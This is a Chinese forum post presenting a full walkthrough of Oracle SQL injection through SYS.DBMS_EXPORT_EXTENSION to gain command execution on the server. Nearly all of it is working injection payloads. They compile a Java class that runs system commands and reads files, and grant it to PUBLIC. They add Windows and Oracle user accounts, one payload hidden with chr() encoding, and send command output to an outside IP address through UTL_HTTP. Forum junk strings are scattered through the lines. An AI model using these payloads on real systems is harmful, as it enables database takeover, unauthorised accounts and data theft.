
标题: 实例演示oracle注入获取cmdshell的全过程

作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
' N4 P+ _* [0 d( v! b/ Z
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
" n& o* H* V# i( h/ q6 h的形式即可。(用" 'a'|| "是为了让语句返回true值) - l  _  w" l' R' `0 h3 q) `
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
: D, N. G+ w' }- _, y/ S& sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 D$ R( k* I% K% r
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(* {* g9 i- E6 b( f  ^5 b
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}. ~2 b1 A0 q; ^2 V7 c) S
}'''';END;'';END;--','SYS',0,'1',0) from dual
  ]6 d( c  e1 \/ v$ D+ R1 r6 w)
/ b5 H6 U; E* \& H------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
- v3 m( F& C; p/xxx.jsp?id=1 and '1'<>'a'||(
4 @4 }* P8 ~) \2 o- g& `0 _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': M, q9 A4 K5 [7 [1 W
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(2 I0 _6 b& Z7 m$ [
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
$ i9 w4 I6 k% h/ c" p$ X}'''';END;'';END;--','SYS',0,'1',0) from dual
. M5 k( g: ~; j! _0 j, R) $ J' e, }7 p# H6 w0 Y
同时把后面步骤 提到的 对readFile()的处理语句去掉。
2 ]- T+ P8 S/ V5 ]: j$ d------------------------------
2.赋Java权限
# b9 L/ e) r: o  T4 H7 I. T8 Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual" v0 I. ?4 m# ?! D, d5 I6 @& A
3.创建函数
) Q1 I: u2 M: B" _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 _7 S! c. i' h: ~# [+ ?7 y
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
& Z3 v5 m$ w7 `) a  g& D1 ~/ iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; n2 j7 j8 O; p7 X4 Jcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
' L: h! ?& Y% s- E" `$ ^$ eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
, z& K2 x; ^: G+ n+ Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
% B) s* d! m# n3 x7 p: z+ p- pand '1'<>'11'||( 4 Q" k) u; D6 R  t9 Z& U
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' : W: E. ?$ k$ o
)
0 T' ^1 Z; o9 [. z. }) nand '1'<>( : P& d$ S' o0 u/ \8 f
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
+ ~5 Q  v& F( i; g- u)
6.执行命令:
' U. Q- {$ p* W. G1 S4 i# e; d- Y- n, D/xxx.jsp?id=1 and '1'<>(
  R' ~/ I% N( B) `  w; mselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual 9 D4 ~' k5 `" x, o8 p/ P
% y0 }8 o) V5 N' L: w
) % w* B( y3 C, t0 {. j4 B" V& X. Q5 L
/xxx.jsp?id=1 and '1'<>(
/ Z" g, H9 C& j$ D# yselect  sys.LinxReadFile('c:/boot.ini') from dual
+ J) j  P; w7 V9 p  S& a3 @- [/ [) ^2 a& e
)# J: z1 q0 b7 _' Z* s
  7 f& A' n. Q/ y! G( a
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
; m/ u, e$ }5 u8 ?" S  E/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual* T" M, G6 j5 V4 {  L6 u8 H
或者UTL_HTTP.request(:
/xxx.jsp?id=1 and '1'<>( * M3 P, w- I# k9 B2 y, s; ~
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
2 a+ C6 B9 J3 y7 w0 ^1 A) 2 T; A' q" c& y1 @  w
/xxx.jsp?id=1 and '1'<>( 4 p! ?. M0 p: n/ `1 i6 D
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual- l6 K: H2 A! s
)   ?3 f. S% p" g3 V. _+ t( }
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
3 M- S' c2 k; i1 }! J--------------------
" G) g, `7 v( m- P, H0 [: \6.内部变化 % p* c5 t# |; r; C- Y7 w/ k! i! X
通过以下命令可以查看all_objects表达改变:
" E! |; x1 i+ n9 W" j$ oselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'* `5 O; O& \, R; j$ V* H6 r# o8 [
7.删除我们创建的函数
1 e% V( e& ], y/ I/ i- tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- @$ m" L( d! c1 Bdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 2 {3 B- P, ~, ~: ?# W* H+ T1 b
==================================================== , [8 `5 d/ w5 C0 Q
全文结束。谨以此文赠与我的朋友。
# F( V) ~: G; s  l* `6 nlinx , Z. ~2 ~2 ]: n( S& ~* }
124829445 2 I0 E8 }2 d" c% @  t6 w4 T
2008.1.12 / Q9 Y% }- l8 K% L- B4 \3 I6 G( ?
linyujian@bjfu.edu.cn , {+ b4 S3 |! g. U4 c/ [. a3 d
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% v# E9 A) f/ U& f( |4 R2 c* A  I4 JCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual1 b: |. h: y( J
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
! {9 w2 Z: w- l, B7 cchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>( $ p) c! M+ Z+ I/ i& ~" _
select user_id from all_users where username='LINXSQL' : w) o  M7 t/ v# v# P4 c+ P/ \
) ' j3 H1 W$ f6 v4 k% y0 E  ]
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 p9 {. t4 K3 H- ~4 z% |GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
3 A/ o! ?  j  }9 @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  u) Q5 v7 }9 n. \3 a- r1 n$ pdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
( M, u8 K. \3 f( ^4 U====================== % s$ g" n* o# d! x0 O0 ~: {1 l0 s
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
1.jsp?id=1 and '1'<>(
5 ~, }/ y' @5 _3 e5 aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 J8 B7 B! A( s0 P) k+ _create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
  K  v% S3 R+ A$ O6 X) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- L$ W( m# Q- p/ J- p2 T
 )& Z+ B% w& E2 h
) a- @! w% I; w$ @
6 X9 \8 h2 U8 ^3 k

% w8 X# L9 `6 M  L! p) O



